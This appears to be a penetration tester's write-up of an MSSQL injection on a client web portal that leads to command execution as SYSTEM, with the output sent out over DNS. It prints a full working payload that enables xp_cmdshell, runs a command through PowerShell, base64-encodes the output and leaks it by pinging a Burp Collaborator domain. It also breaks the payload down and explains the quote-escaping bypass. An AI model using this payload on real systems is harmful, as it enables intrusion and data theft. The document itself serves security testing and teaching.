In a recent engagement with Client’s Public Infrastructure, I found Error Based MSSQL Injection on a web portal which leads me to execute commands on the internal server machine, running with the highest privilege user i.e. nt authority\system. The fun part was to retrieve the response of executed commands through DNS request as it was the only protocol that was allowed in egress rules. I tried getting a response from other network protocols i.e. http, ftp, smb, icmp, but I was only able to receive DNS request from the target machine on my server.
I used the following command to execute on the target machine. Despite searching from many online resources, none of the commands worked for me. So at the end, I had to build my own command, as some keywords were causing issue and moreover, I had to bypass single quotes in xp_cmdshell too.
Command Executed
vulnParam=xxx';EXEC sp_configure 'show advanced options', 1; EXEC sp_configure 'xp_cmdshell', 1; reconfigure with override; exec master..xp_cmdshell 'powershell $cmd=whoami; $enc=[Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($cmd)).trim(''=''); ping -n 1 $enc''.h28348ewbr8323ub38923ui2rb.burpcollaborator.net'' '-- -
Breakdown
EXEC sp_configure 'show advanced options', 1; EXEC sp_configure 'xp_cmdshell', 1; reconfigure with override; To enable xp_cmdshell for executing commands on target machine
exec master..xp_cmdshell "<Payload>" Execute Payload with xp_cmdshell
$cmd=whoami;$enc=[Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($cmd)).trim(''=''); Executing Whoami Command and converting it to Base64. As DNS Queries can not contain non-alphanumeric characters.
ping -n 1 $enc''.h28348ewbr8323ub38923ui2rb.burpcollaborator.net'' This would resolve our domain to give us executed command response in DNS request
Important Note: The quotes used within xp_cmdshell are not double Quotes but are Single Quotes (‘), used twice('') to bypass Single quotes in XP_CMDShell String.
Burp Collabfiltrator
Moreover, little did I know at that time, there’s an excellent tool out there, known as Collabfiltrator, to exfiltrate blind remote code execution output over DNS via Burp Collaborator. It’s available on BApp store. The working of the tool is simple. You have to generate a payload with collabfiltrator of your desired command that will be base64 encoded and run the generated payload on your target. The tool will take care of rest of the part for retrieving data from DNS Queries. Hats off to the creator.
https://github.com/0xC01DF00D/Collabfiltrator
References
- https://sqlwiki.netspi.com/attackQueries/informationGathering/#sqlserver
- https://notsosecure.com/oob-exploitation-cheatsheet/
- https://deepsec.net/docs/Slides/2018/DNS_Exfiltration_and_Out-of-Band_Attacks_Nitesh_Shilpkar.pdf
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md
- https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/
- https://github.com/0xC01DF00D/Collabfiltrator